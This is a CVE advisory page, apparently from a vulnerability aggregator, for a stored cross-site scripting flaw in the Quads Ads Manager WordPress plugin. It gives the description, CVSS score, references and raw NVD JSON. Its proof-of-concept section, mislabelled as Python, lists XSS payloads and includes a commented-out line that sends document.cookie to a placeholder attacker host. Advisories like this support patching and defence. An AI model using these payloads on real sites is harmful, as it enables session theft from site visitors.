CVE-2026-2595

Description

The Quads Ads Manager for Google AdSense plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.98.1 due to insufficient input sanitization and output escaping of multiple ad metadata parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Quads Ads Manager for Google AdSense <= 2.0.98.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- 
  PoC for CVE-2026-2595 
  Target: Quads Ads Manager for Google AdSense <= 2.0.98.1
  Type: Stored XSS
-->

<!-- Step 1: Log in as a user with Contributor privileges. -->
<!-- Step 2: Navigate to Quads -> Ads -> Add New. -->
<!-- Step 3: Insert the following payload into the 'Ad Title' or metadata field. -->

<script>
  // Malicious payload to steal cookies or demonstrate execution
  alert('CVE-2026-2595 Stored XSS Executed!');
  // fetch('https://attacker.com/steal?c=' + document.cookie);
</script>

<!-- Alternatively, using SVG or Image tag if script tags are stripped by WAF (if any) -->
<img src=x onerror=alert('XSS')>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2595
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2595
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2595/
[4] VulDB https://vuldb.com/cve/CVE-2026-2595
[5] https://plugins.trac.wordpress.org/changeset/3467744/quick-adsense-reloaded
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/99051b12-5a24-4108-9ea4-81f37a1c1b35?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2595", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:03.850", "lastModified": "2026-04-24T16:36:24.067", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quads Ads Manager for Google AdSense plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.98.1 due to insufficient input sanitization and output escaping of multiple ad metadata parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Quads Ads Manager para Google AdSense para WordPress es vulnerable a cross-site scripting almacenado en versiones hasta la 2.0.98.1, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes de múltiples parámetros de metadatos de anuncios. Esto permite a atacantes autenticados, con acceso de nivel Colaborador o superior, inyectar scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3467744/quick-adsense-reloaded", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/99051b12-5a24-4108-9ea4-81f37a1c1b35?source=cve", "source": "[email protected]"}]}}